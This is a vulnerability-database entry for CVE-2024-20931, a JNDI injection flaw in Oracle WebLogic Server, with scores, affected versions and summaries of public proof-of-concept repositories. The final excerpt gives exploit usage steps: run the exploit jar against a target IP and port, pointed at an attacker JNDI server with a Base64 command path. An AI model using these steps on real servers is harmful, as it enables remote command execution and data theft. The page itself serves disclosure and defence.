
CVE-2024-20931

CVSSv4: NA | CVSSv3: 7.5 | CVSSv2: NA | VMScore: 850 | EPSS: 0.00043 | KEV: Not Included
Published: 17/02/2024 Updated: 29/11/2024

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

Vulnerable Product

oracle weblogic server 12.2.1.4.0

oracle weblogic server 14.1.1.0.0

Vendor Advisories

Check Point Reference: CPAI-2024-0082 Date Published: 12 Mar 2024 Severity: Critical ...

Github Repositories

The Poc for CVE-2024-20931

CVE-2024-20931 The Poc for CVE-2024-20931 Vulnerability Analysis: A New Attack Surface for JNDI Injection - Analysis of CVE-2024-20931

CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol

🚨 CVE-2024-20931 🚨 CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol A new attack surface for JNDI injection-CVE-2024-20931 analysis introduction In the latest official January 2024 patch released by Oracle, a remote command execution vulnerability CVE-2024-20931 based on the Weblogic T3\IIOP protocol has been fixed This vulnerability was submitted to O

Command-line vulnerability scanning tool dedicated to WebLogic,

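Getting Started. Feature overview. 1. Command details. Command description: -h: show details of all commands; -l: list all vulnerabilities supported for detection; -bList: list all vulnerabilities supported for batch detection; -sVersion: precisely scan the target version; supported: Weblogic. Usage: java -jar xxjar -sVersion <targetIp> <TargetPort> JNDI usage notes: Usage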

CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839

CVE-2024-20931 CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839 Oracle Weblogic Usage: Setup JNDI, the specific one from githubcom/WhiteHSBG/JNDIExploit/ Exploit: java -jar CVE-2024-20931jar Please input target IP:127001 Please input target port:7001 Please input RMI Address(ip:port/exp):JNDISERVER:1389/Basic/Command/Base64/BASE64COMMAND